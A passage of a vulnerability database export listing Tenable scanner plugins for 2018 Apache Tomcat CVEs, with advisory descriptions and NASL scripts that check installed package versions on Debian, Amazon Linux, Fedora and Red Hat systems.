value:\"p-cpe:/a:debian:debian_linux:tomcat8-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:33", "description": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat7 / tomcat80 (ALAS-2018-1055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2018-08-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "p-cpe:/a:amazon:linux:tomcat80", "p-cpe:/a:amazon:linux:tomcat80-admin-webapps", "p-cpe:/a:amazon:linux:tomcat80-docs-webapp", "p-cpe:/a:amazon:linux:tomcat80-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat80-javadoc", "p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat80-lib", "p-cpe:/a:amazon:linux:tomcat80-log4j", "p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat80-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1055.NASL", "href": "https://www.tenable.com/plugins/nessus/111610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1055.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111610);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/08/31 12:25:01\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"ALAS\", value:\"2018-1055\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 / tomcat80 (ALAS-2018-1055)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with\nsupplementary characters can lead to an infinite loop in the decoder\ncausing a Denial of Service. Versions Affected: Apache Tomcat\n8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1055.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update tomcat7' to update your system.\n\nRun 'yum update tomcat80' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.90-1.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-admin-webapps-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-docs-webapp-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-el-3.0-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-javadoc-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-jsp-2.3-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-lib-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-log4j-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-servlet-3.1-api-8.0.53-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-webapps-8.0.53-1.80.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:11:38", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities.\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n - An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user. (CVE-2018-8037)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.x < 9.0.10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700708.PASL", "href": "https://www.tenable.com/plugins/nnm/700708", "sourceData": "Binary data 700708.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:15:37", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities:\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n\n - A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n - An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user. (CVE-2018-8037).", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.x < 9.0.10 Security Misconfiguration", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700707.PASL", "href": "https://www.tenable.com/plugins/nnm/700707", "sourceData": "Binary data 700707.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:24:27", "description": "The version of Apache Tomcat installed on the remote host is version 8.5.x prior to 8.5.32. It is, therefore, affected by multiple vulnerabilities :\n\n - The defaults settings for the CORS filter are insecure and enable supportsCredentials for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. (CVE-2018-8034)\n - If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. (CVE-2018-8037)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.x < 8.5.32 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700695.PASL", "href": "https://www.tenable.com/plugins/nnm/700695", "sourceData": "Binary data 700695.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:22", "description": "This update includes a rebase from 8.5.30 up to 8.5.32 which resolves two CVEs along with various other bugs/features :\n\n - rhbz#1579612 CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins\n\n - rhbz#1607586 CVE-2018-8034 tomcat: host name verification missing in WebSocket client\n\n - rhbz#1607584 CVE-2018-8037 tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : 1:tomcat (2018-b1832101b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-B1832101B8.NASL", "href": "https://www.tenable.com/plugins/nessus/120717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b1832101b8.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120717);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"FEDORA\", value:\"2018-b1832101b8\");\n\n script_name(english:\"Fedora 28 : 1:tomcat (2018-b1832101b8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes a rebase from 8.5.30 up to 8.5.32 which resolves\ntwo CVEs along with various other bugs/features :\n\n - rhbz#1579612 CVE-2018-8014 tomcat: Insecure defaults in\n CORS filter enable 'supportsCredentials' for all origins\n\n - rhbz#1607586 CVE-2018-8034 tomcat: host name\n verification missing in WebSocket client\n\n - rhbz#1607584 CVE-2018-8037 tomcat: Due to a mishandling\n of close in NIO/NIO2 connectors user sessions can get\n mixed up\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b1832101b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:tomcat package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"tomcat-8.5.32-1.fc28\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:55:21", "description": "The version of Apache Tomcat installed on the remote host is 9.0.x prior to 9.0.10. It is, therefore, affected by multiple vulnerabilities.\n A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.9 due to insecure default settings for the CORS filter (CVE-2018-8014).\n A security misconfiguration vulnerability exists in Apache Tomcat prior to version 9.0.10. Hostname validation was not enabled by default when using TLS with the WebSocket client (CVE-2018-8034).\n\n An information disclosure vulnerability exists in Apache Tomcat prior to version 9.0.10 due to a race condition. If an async request was completed by the application at the same time as the container triggered the async timeout, this could lead to a user being sent the response of another user (CVE-2018-8037).", "cvss3": {}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0 < 9.0.10 Multiple Vulnerabilites", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_9.NASL", "href": "https://www.tenable.com/plugins/nessus/111069", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111069);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2018-8014\");\n script_bugtraq_id(104203, 104894, 104895);\n\n script_name(english:\"Apache Tomcat 9.0.0 < 9.0.10 Multiple Vulnerabilites\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.0.x\nprior to 9.0.10. It is, therefore, affected by multiple \nvulnerabilities.\n A security misconfiguration vulnerability exists in Apache Tomcat\n prior to version 9.0.9 due to insecure default settings for the \n CORS filter (CVE-2018-8014).\n \n A security misconfiguration vulnerability exists in Apache Tomcat \n prior to version 9.0.10. Hostname validation was not enabled by \n default when using TLS with the WebSocket client (CVE-2018-8034).\n\n An information disclosure vulnerability exists in Apache Tomcat\n prior to version 9.0.10 due to a race condition. If an async\n request was completed by the application at the same time as the \n container triggered the async timeout, this could lead to a user\n being sent the response of another user (CVE-2018-8037).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://svn.apache.org/viewvc?view=rev&rev=1831726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.9 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '9.0.9', min:'9.0.0', severity:SECURITY_HOLE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:56", "description": "An update is now available for Red Hat JBoss Web Server 3.1 for RHEL 6 and Red Hat JBoss Web Server 3.1 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 4 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat-native: Mishandled OCSP invalid response (CVE-2018-8019)\n\n* tomcat-native: Mishandled OCSP responses can allow clients to authenticate with revoked certificates (CVE-2018-8020)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nThe following packages have been upgraded to a newer upstream version :\n\n* OpenSSL (1.0.2n)\n\n* APR (1.6.3)\n\nCVE-2018-8019 and CVE-2018-8020 were discovered by Coty Sutherland (Red Hat).", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server 3.1.0 Service Pack 4 (RHSA-2018:2469)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8019", "CVE-2018-8020"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat-native", "p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:tomcat7", "p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux", "p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api", 